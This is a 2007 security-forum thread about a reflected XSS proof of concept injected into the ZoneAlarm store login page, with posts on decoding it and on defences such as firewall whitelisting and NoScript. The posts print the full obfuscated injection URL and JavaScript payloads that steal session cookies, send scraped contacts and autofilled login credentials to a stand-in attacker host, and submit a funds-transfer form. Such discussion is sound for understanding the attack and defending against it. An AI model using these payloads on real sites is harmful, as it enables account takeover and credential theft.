XSS sample using Zone Alarm link

Discussion in 'other security issues & news' started by elio, May 10, 2007.

Thread Status:
Not open for further replies.
  1. elio
    Offline

    elio Registered Member

    Last edited: May 10, 2007
  2. fax
    Offline

    fax Registered Member

    Re: ZoneAlarm Pro 70_337_000

    Just an empty page... to my end.
    But if a click on my account I get the page where you are asked to input your log-in and password.

    Fax
  3. elio
    Offline

    elio Registered Member

    Re: ZoneAlarm Pro 70_337_000

    Completely empty?
    What does "click on my account" mean?
    Have you got JavaScript enabled?
  4. fax
    Offline

    fax Registered Member

    Re: ZoneAlarm Pro 70_337_000

    Yes, empty page... only ZA headers and footers.

    Your link is to ZA customer account. You need to input the login and password to log-in.

    Yes, Java is enabled.

    Fax
  5. fax
    Offline

    fax Registered Member

    Re: ZoneAlarm Pro 70_337_000

    What I should have seen Elio? o_O

    Fax
  6. elio
    Offline

    elio Registered Member

    Re: ZoneAlarm Pro 70_337_000

    If you followed the link and you had JavaScript enabled, you should see the real, legit ZoneAlarm customer area login page injected with an external script: XSS PoC by a certain "mario".
    This is innocuous, but if you were already logged in (or you had password automatic completion) and he was a bad guy he could own your account unnoticed, rather than displaying a dumb "defacement" page.
    Screenshot attached (taken 2 minutes ago).

    Attached Files:

    • xss.jpg
      xss.jpg
      File size:
      82.4 KB
      Views:
      2,146
  7. fax
    Offline

    fax Registered Member

    Re: ZoneAlarm Pro 70_337_000

    Thanks for this... In my case it does not work...
    I have javascript enabled... but I don't use password automatic completion.. and I usually log-off from sites after having used them.

    My password are kept safe with double Rijndael 256-Bit encryption and don't stay in clipboard or in memory more than 5 seconds after their use :D

    Fax
  8. mcastr
    Offline

    mcastr Registered Member

    Re: [Split Topic] XSS sample using ZA link

    It doesn't work for me either, using IE6. I have javascript enabled as well, I get a popup that IE can't open or process the page with a bunch of numbers, then when I click OK I get Page Not Found.

    It does work with Firefox though.
  9. Rmus
    Offline

    Rmus Exploit Analyst

    Re: [Split Topic] XSS sample using ZA link

    Hi elio,

    This very interesting!

    My results are the same as mcastr.

    Regarding the link: how did you find it? It appears to be someone's session ID.


    regards,

    -rich
    Last edited: May 12, 2007
  10. fax
    Offline

    fax Registered Member

    Re: [Split Topic] XSS sample using ZA link

    Yep! I can confirm too...

    With IE7 nothing.
    With Firefox it works!

    Fax
  11. elio
    Offline

    elio Registered Member

    Re: [Split Topic] XSS sample using ZA link

    Sorry, didn't bother to test on IE :oops:
    It seems that the included script being loaded from a non-SSL server was troublesome ("This page contains unprotected objects...").

    I've got no SSL server to work-around, but this one will work on IE7 nonetheless :)

    rich:
    The session ID is mario's, I guess. I found the original in RSnake's forum.
    I changed it to use English instead of German, and now I "enhanced" it to work with IE7.
    Those hardcore hackers, thinking that if it works with Firefox it's gonna work everywhere ;)
    Last edited: May 10, 2007
  12. Rmus
    Offline

    Rmus Exploit Analyst

    Re: [Split Topic] XSS sample using ZA link

    Well, after thinking about it, it can't be someone's sessionID because everytime I've checked my own sessions,
    once I've logged off and the session cookie is discarded, that page will no longer load.

    So, what has he done? How did he get that page to load that you posted?

    Since it's javascript, a search of the cached .js files revealed the culprit:

    http://www.urs2.net/rsj/computing/imgs/xss_cache.gif

    http://www.urs2.net/rsj/computing/imgs/xss_js.gif

    Now, how did that i.js file get cached? Looking at the source code revealed nothing.
    Hmmm... Must be some obfuscation somewhere.

    Comparing a legitimate ZA login page with mario's page you linked reveals an interesting difference.
    The following appears in mario's page but not the legitimate ZA page:

    Code:
    <input type="hidden" value="glo"><script>eval(String.fromCharCode(97,61,100,111,99,117,
    109,101,110,116,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,
    105,112,116,39,41,59,97,46,115,114,99,61,39,104,116,116,112,58,47,47,104,52,107,46,105,
    110,47,105,46,106,115,39,59,100,111,99,117,109,101,110,116,46,98,111,100,121,46,97,112,
    112,101,110,100,67,104,105,108,100,40,97,41,59))</script>bal.jsp" name="destination"/></td>
    
    Well, that eval(String.fromCharCode happens to be appended to the link you posted:

    Code:
    https://www.zonealarm.com/store/application;jsessionid=GAwSf4C5dJtd3A5PIG4e7
    TNkOv0tIU9JP0UHFsT9JD7HKigvl1Q2!-1992105728!-1062696903!7551!7552!NONE?namespace=zls_user&
    
    origin=glo%22%3E%3Cscript%3Eeval(String.fromCharCode(97,61,100,111,99,117,109,101,110,116,
    46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,59,97,
    46,115,114,99,61,39,104,116,116,112,58,47,47,104,52,107,46,105,110,47,105,46,106,115,39,59,100,
    111,99,117,109,101,110,116,46,98,111,100,121,46,97,112,112,101,110,100,67,104,105,108,100,40,97,
    41,59))%3C/script%3Ebal.jsp&event=link.login&dc=34std&ctry=DE&lang=en
    
    Easy enough to convert to ASCII. The pertinent data is
    Code:
    104,116,116,112,58,47,47,104,52,107,46,105,110,47,105,46,106,115
    
    which is:
    Code:
    http://h4k.in/i.js
    
    While this is interesting, I hope you will eventually post a real-world example as you described in the other thread, beginning with your post #25, that doesn't require user interaction:

    http://www.wilderssecurity.com/showthread.php?t=173750

    You wrote later in the thread,

    I gave an old PayPal example, whose techniques you said were outdated:
    Fair enough. So, give us an example.

    You wrote in the other thread,

    I would like to see a real-world example - no PoC or snake oil - where you explain step-by-step what happens, from the moment the user goes to the page, through the Log-in, and most important how the hacker retrieves the information. I assume he doesn't knock on your door and ask you pretty-please.

    It is the point of retrieval which will give us something to work with.

    regards,

    -rich

    ________________________________________________________________
    "Talking About Security Can Lead To Anxiety, Panic, And Dread...
    Or Cool Assessments, Common Sense And Practical Planning..."
    --Bruce Schneier​
  13. elio
    Offline

    elio Registered Member

    Re: [Split Topic] XSS sample using ZA link

    OK, random porn site containing the following:
    Code:
    <iframe style="width: 1px; height: 1px;" 
      src="http://www.zonealarm.com/store/...all...our...fancy...XSS...URL">
    </iframe>
    
    This will navigate automatically (no user interaction) silently and invisibly to the vulnerable site.
    If there's some form of auto-completion or "remember me" function, or the victim is already logged in... OMG!
    That's the easiest part, really.
    Three non interactive scenarios:
    1. Victim already logged in and we already know the topology of the vulnerable site
      We can ride the session using JavaScript navigation, non need to retrieve actual credentials.
      Example (supposing we're in some "send money form"):
      Code:
      document.getElementById("amount").value="10000";
      document.getElementById("pay-form").submit();
      
      Or, if we want to scrape the content of some interesting page, like his contact list on a webmail:
      Code:
      var x = new XMLHttpRequest();
      x.open("GET", "contactlist.aspx", false);
      x.send(null);
      var f = document.body.appendChild(document.createElement("form"));
      var i = f.appendChild("input");
      i.name = "contacts";
      i.value = x.responseText;
      f.action="http://elio-the-evil-hacker.com/mail_collector.php";
      f.submit();
      
    2. Victim already logged in, site internals unknown or changing
      We could steal session cookie and ride the session manually, just
      Code:
      new Image().src="http://elio-the-evil-hacker.com?session-cookie=" + 
      document.cookie
      
    3. Victim not logged in, but has form automatic completion enabled
      We just wait for login form to be auto-completed and then we phone home (or we "click" on the submit button and ride the session, if we know how the site is made inside):
      Code:
      function xss() {
       var f = document.forms[2]; // grab the 3rd form in the page, the login one
       if(!(f && f.zl_user_name && f.zl_user_password)) return // nothing to see here
       if(f.zl_user_name.value && f.zl_user_password.value) {
         // we've got everything, let's phone home
         new Image().src="hxxp://elio-the-evil-hacker.com?u=" + 
           escape(f.zl_user_name.value) + "&p=" + 
           escape(f.zl_user_password.value);
      
        // OK, this is just a demo
        document.body.innerHTML = "Your credentials have just been stolen:<br>" + 
             f.zl_user_name.value + ", " + 
             f.zl_user_password.value + "<h1>MWAHAHAHA!</h1>";
        return;
       }
       if(f.zl_user_password.onchange == xss) return;
       f.zl_user_name.onchange = xss;
       f.zl_user_password.onchange = xss;
      }
      window.onload = xss;
      
    If everything else fails, we can just resort to good old social engineering combined with approach #3:
    I could post in this forum something like
    OMG, the location bar and the SSL lockpad both say I'm on the legit site: it may even work :p
    Last edited: May 10, 2007
  14. Rmus
    Offline

    Rmus Exploit Analyst

    Re: [Split Topic] XSS sample using ZA link

    This is the point at which I think the attack can be stopped. Can you guess how?

    I will return to this in a few hours - I'm leaving for a meeting - and I will layout a security strategy that might work.

    Meanwhile, since you know the code thoroughly, can you suggest a solution to prevent the stealing of the user's information?

    regards,

    -rich

    ________________________________________________________________
    "Talking About Security Can Lead To Anxiety, Panic, And Dread...
    Or Cool Assessments, Common Sense And Practical Planning..."
    --Bruce Schneier​
    [/QUOTE]
  15. Rmus
    Offline

    Rmus Exploit Analyst

    Well, I was hoping you might have come up with a suggestion...

    OK. Somewhere in one of these threads I mentioned that everyone should know how their secure-transaction sites work. To be really on top of it would be to know the IP addresses that are called during the transaction.

    Some sites use an unsecure HTTP home page and then switch to a secure log-in HTTPS page. My bank has just one secure HTTPS URL for the entire transaction.

    How do you determine the the IP(s)? By letting your browser prompt when you initially establish your account.

    This requires that you have three browser rules in your firewall ruleset:
    • 1) HTTP Port 80 any address: this is your normal surfing rule - all traffic permitted
    • 2) HTTP Port 80 custom addresses: here, you enter any HTTP address that your transaction sites use
    • 3) HTTPS Port 443 custom addresses: same as rule 2) but HTTPS
    Here is my rule set:

    http://www.urs2.net/rsj/computing/imgs/xss_ruleset.gif

    The second two rules have created a White List (custom addresses) of permitted IPs.

    Have you guessed by now what's going on? This is one way of preventing pharming.

    Pharming is when a user thinks she/he is accessing the legitimate site's page, when she/he is actually accessing the IP of a spoofed site.

    And isn't that really what's going on behind the scenes in these scripts? When the user clicks "Submit" the information should stay within the site, but this script says, Nope: I'm sending this to elio-the-evil-hacker .

    Well, maybe not.

    Let's test it out with your ZA link from your first post.

    I went to the ZA site to snag the IPs - that site has tracking and webstore stuff. Oh well... in the name of testing...

    So, with those IPs in the custom addresses, let's see what happens.

    Now, with this setup, before you go to your transaction site, you uncheck the first browser rule and this passes the firewall check order down to the next rule, which will alert if an IP request doesn't match what is on the White List (custom addresses).

    So, I click on your link, the page starts to load, it looks like the normal ZA site, and as soon as the "eval(String.fromCharCode" is appended to the PageSourceCode, the attempt to connect out to cache the i.js file initiates,

    Code:
    http://h4k.in/i.js
    
    ooops... since that IP doesn't match any IP on the White List:

    http://www.urs2.net/rsj/computing/imgs/xss_kerio.gif

    At this point, the alert user will realize something is amiss. Verifying:

    Code:
    Initiating server query ...
    Looking up the [b]domain name for IP: 62.75.146.110[/b]
    The domain name for the IP address is: static-ip-62-75-146-110.inaddr.intergenia.de
    Date: Fri, 11 May 2007 01:12:13 GMT
    Server: Apache
    X-Pingback:[b] http://mario.heideri.ch/xmlrpc.php[/b]
    Query complete.
    
    ...
    
    netname:      VSERVER-1
    descr:        vSERVER - Virtual dedicated Server-Hosting
    descr:        http://www.vserver.de
    country:      DE
    
    and:

    Code:
    Initiating server query ...
    Looking up IP address for [b]domain: h4k.in[/b]
    The IP address for the domain is: [b]62.75.146.110[/b]
    Query complete.
    
    In your script, when the user clicks "Submit" and initiates the request to connect to elio-the-evil-hacker, a similar alert would be triggered.

    Well, there may be some sophisticated ways around this, but I don't think cybercriminals are too worried about many people going to this trouble. I know of only one other person besides myself.

    regards,

    -rich

    ________________________________________________________________
    "Talking About Security Can Lead To Anxiety, Panic, And Dread...
    Or Cool Assessments, Common Sense And Practical Planning..."
    --Bruce Schneier​
  16. nadirah
    Offline

    nadirah Registered Member

    The NoScript extension for firefox now has some XSS handling functionality.

    V. 1.1.4.8.070430 "XSS Sniper + Flash Nanny"

    Main good news:
    • Experimental noscript.contentBlocker hidden preference, extends the content restrictions for untrusted sites also to trusted pages, turning NoScript in a general content blocker for Java, Flash and other plugins functionally similar to FlashBlock.
    • Reset button in Options Dialog restores default settings.
    • Much improved precision of the Anti-XSS protection, enhanced also by configurable exceptions and an "Unsafe Reload" command to deal with very few remaining false positives.
      While Cross-Site Scripting (XSS) vulnerabilities need to be fixed by the web developers, now users can finally do something to protect themselves: NoScript is the only effective defense available to "web-consumers", waiting for "web-providers" to clean up their mess.
    • Options dialog simplification and reorganization.
    • New option to block META redirections placed inside <NOSCRIPT> elements (Firefox 2 and above, no SeaMonkey yet)
    • Plays nicer with Digg and other "Web 2.0" sites, by definitely fixing an occasional glitch which previously happened with the nested dynamic loading hack used by some AJAX libraries.
    • Super fast and reliable reload when permissions changes.
    • Long awaited blacklist feature.
    More in the changelog... If you don't want this information page to open next time you upgrade NoScript, please read this FAQ.
  17. nadirah
    Offline

    nadirah Registered Member

    Besides the above, here are some details of the page source at hxxps://www.zonealarm.com/store/......
    Code:
    <!--WEBSIDESTORY CODE HBX1.0 (Universal)-->
    <!--COPYRIGHT 1997-2004 WEBSIDESTORY,INC. ALL RIGHTS RESERVED. U.S.PATENT No. 6,393,479B1. MORE INFO:http://websidestory.com/privacy-->
    
    <script language="javascript">
    var _hbEC=0,_hbE=new Array;function _hbEvent(a,b){b=_hbE[_hbEC++]=new Object();b._N=a;b._C=0;return b;}
    var hbx=_hbEvent("pv");hbx.vpc="HBX0100u";hbx.gn="ehg.zonelabs.com";
    
    //BEGIN EDITABLE SECTION
    //CONFIGURATION VARIABLES
    hbx.acct="DM5404078ADR94EN3";//ACCOUNT NUMBER(S)
    hbx.pn="/store/login.jsp";//PAGE NAME(S)
    hbx.mlc="";//MULTI-LEVEL CONTENT CATEGORY
    hbx.pndef="title";//DEFAULT PAGE NAME
    hbx.ctdef="full";//DEFAULT CONTENT CATEGORY
    
    //OPTIONAL PAGE VARIABLES
    //ACTION SETTINGS
    hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNCTION NAME
    hbx.lt="auto";//LINK TRACKING
    hbx.dlf="n";//DOWNLOAD FILTER
    hbx.dft="n";//DOWNLOAD FILE NAMING
    hbx.elf="n";//EXIT LINK FILTER
    
    //SEGMENTS AND FUNNELS
    hbx.seg="";//VISITOR SEGMENTATION
    hbx.fnl="";//FUNNELS
    
    //CAMPAIGNS
    hbx.cmp="";//CAMPAIGN ID
    hbx.cmpn="";//CAMPAIGN ID IN QUERY
    hbx.dcmp="";//DYNAMIC CAMPAIGN ID
    hbx.dcmpn="";//DYNAMIC CAMPAIGN ID IN QUERY
    hbx.dcmpe="";//DYNAMIC CAMPAIGN EXPIRATION
    hbx.dcmpre="";//DYNAMIC CAMPAIGN RESPONSE EXPIRATION
    hbx.hra="";//RESPONSE ATTRIBUTE
    hbx.hqsr="";//RESPONSE ATTRIBUTE IN REFERRAL QUERY
    hbx.hqsp="";//RESPONSE ATTRIBUTE IN QUERY
    hbx.hlt="";//LEAD TRACKING
    hbx.hla="";//LEAD ATTRIBUTE
    hbx.gp="";//CAMPAIGN GOAL
    hbx.gpn="";//CAMPAIGN GOAL IN QUERY
    hbx.hcn="";//CONVERSION ATTRIBUTE
    hbx.hcv="";//CONVERSION VALUE
    hbx.cp="null";//LEGACY CAMPAIGN
    hbx.cpd="";//CAMPAIGN DOMAIN
    
    //CUSTOM VARIABLES
    hbx.ci="";//CUSTOMER ID
    hbx.hc1="en";//CUSTOM 1
    hbx.hc2="DE";//CUSTOM 2
    hbx.hc3="English-EU";//CUSTOM 3
    hbx.hc4="/store/login.jsp | lang-en_ctry-DE_dc-34std_campaign_id-nvp_lid-nvp_pid-nvp_prt-nvp_c-nvp_d-nvp_w-nvp";//CUSTOM 4
    hbx.hrf="";//CUSTOM REFERRER
    hbx.pec="";//ERROR CODES
    
    //INSERT CUSTOM EVENTS
    
    //END EDITABLE SECTION
    
    //REQUIRED SECTION. CHANGE "YOURSERVER" TO VALID LOCATION ON YOUR WEB SERVER (HTTPS IF FROM SECURE SERVER)
    </script>
    <script language="javascript1.1" defer src="/store/media/js/hbx/hbx.js"></script>
    
    Code:
    <!-- Begin SearchRev Lead Tag -->
      
      <noscript>
      <img src='http://s2.srtk.net/www/delivery/ti.php?bannerid=81&trackerid=258&cb=8829' width='1' height='1' border='0'/>
      </noscript>
      <!-- Begin SearchRev Lead Tag -->
      <script type="text/javascript" src="http://s2.srtk.net/www/delivery/srtag.s2.js"></script>
      <script type="text/javascript">
      // SearchRev tag parameters (do not change)
      var sr_tagtype="LEAD";
      var fpc=1;
      sr_tag(258,81);
    </script>
      <!-- End SearchRev Lead Tag -->
      <!-- -----The following Coding is for the Advertising.com Web Beacon ---- -->
      <img src="http://leadback.advertising.com/adcedge/lb?site=695501&srvc=1&betr=znealrm_cs=1&betq=3239=373541" width = "1" height = "1" border = "0">
    Screenshot
    ------------

    Attached Files:

  18. Mrkvonic
    Online

    Mrkvonic Linux Systems Expert

    Hello,

    elio, good job on the code. Now... the tricky question.

    Do you remember what I asked you in the other thread, regarding the link in the forum and getting owned?

    Well, I do not see how the system gets owned here. No silent installation of a trojan that takes over the system or anything ... That's something that cannot be readily done in Firefox.

    For example, reading an arbitrary file off the hard disk, changing a dll, injecting tomato soup into winlogon etc...

    Mrk
  19. fax
    Offline

    fax Registered Member

    Unless is better deviced, you still easily stop this attack, even without setting specific rules...

    Image1.jpg

    Fax
  20. elio
    Offline

    elio Registered Member

    Unless I'm missing something, your own screenshot tells a different tale o_O
  21. fax
    Offline

    fax Registered Member

    The screenshot display what happens if you do not allow unsecure connection while within a secure connection. ie. operation aborted.

    So, next step to improve it is to connect to a secure site, so to avoid IE to warn you :D

    Fax
  22. elio
    Offline

    elio Registered Member

    Do you remember the premise in my first "real" post in this forum?
    While your last statement is questionable too, I do believe Mozilla team is the most responsive around, but I also believe PC "0wn3sh1p" is a bit overrated.

    Many people here tend to overlook what goes on inside their browsers, as long as they've got antivirus, firewall and possibly a sandbox wrapped around their browsers.

    So anything JavaScript related is either labeled as browser specific (my browser is safer than yours) or paranoid (my PC can't be hacked anyway), while we're talking about cross-browser web bugs, not browser/system vulnerabilities.

    The fact is that a steadily increasing part of our life is moving online, so having our web identities (and bank accounts) compromised can be just as bad as having our PCs injected with "tomato soup into winlogon etc..."
  23. elio
    Offline

    elio Registered Member

    Sorry, I go offline from time to time :)
    Anyway, the only suggestion I could give at this moment would be nadirah's one (use Noscript) coupled with never whitelist sites containing user-generated content!.

    I can only agree, but I cannot see any "normal" user doing that.

    My bank, for instance, which is still considered one of the most secure in the world, even serves images and other static content from HTTP connections even in "secure" pages (for performance reasons, I guess).
    Again, I can only agree.
    I also unconditionally approve your attitude to security, default deny (which, if taken seriously, would reveal how anti-virus products as they're conceived today are just a money-mongering joke).
    But you're suggesting to whitelist HTTP connections (i.e. the sites I can open) and prompt me (block me!) every time I follow a casual link :eek:
    The Noscript extension has been recently called "madness" because denying just code execution (in a non-blocking, easy-opt-in fashion) would be too much "crippling the web"...
    It's not, indeed, but good attempt anyway.
    Reflected XSS is neither Phishing nor Phleshing :D nor Pharming, even if it can be used as a tool to make those scams way more effective: no anti-phishing system that I know would detect these attacks.
    The most important aspect is that the page is not made up to appear like the original, it is the true original from the true original server (just "enhanced" with some alien code of mine).
    Now the cool thing is not that my code, once it's there, could steal your data: the real deal is that it can do anything YOU can do.
    Even supposing that you whitelist the "good" HTTP traffic (and this sounds hardly effective if I decide to post the data in a google group, in a google document or in another wonderful read/write google tool using an account set up just for this scam), how do you cope with the fact I could order a money transfer (supposing this is a bank account or Paypal) or send an email containing the interesting data to my disposable mail address (supposing this is a webmail) or any other funny activity I can imagine to perform impersonating you without leaving the vulnerable site*?

    *ehy fax ^^ :D
    Last edited: May 11, 2007
  24. fax
    Offline

    fax Registered Member

    Eheh... LOL :-*

    Fax
  25. Mrkvonic
    Online

    Mrkvonic Linux Systems Expert

    Hello,

    elio,

    Regarding in-browser threats. I think these are indeed overrated, too.

    Automatically remember your password
    Well, that does kind of contradict the meaning of password right?

    Doing sensitive stuff online
    This has much to do with your country law and bank policy than the Internet. For example, your bank account is limited to transferring money only to a number of accounts. So it does not matter if someone can enter, because that someone cannot do any damage.

    More on doing sensitive stuff online
    Why click on a link in an email to access your bank site? You know your bank site. You do not need funny looking links to do that. This has little to do with browser security and much with brains.

    Life online
    No matter how fervently Yahoo or MySpace might want me to dedicate my feeble existence to their badly coded pages - and read about my favorite celebrities doing charity enemas in Uganda - this is not something that is going to happen any time soon.
    - Personally, because I refuse to suckle on the MPIA teat.
    - Globally, luckily, because people are morons and will take them 30 years to get the hang of the Internet.

    Eventually, it comes to brains.
    If you are not likely to fall for any social engineering, you won't fall for this one too. So it's not really a matter of security. It's more of a trend. The victims will always be the same group of people, roughly 90% of the population, the people who never learn.

    Mrk
Thread Status:
Not open for further replies.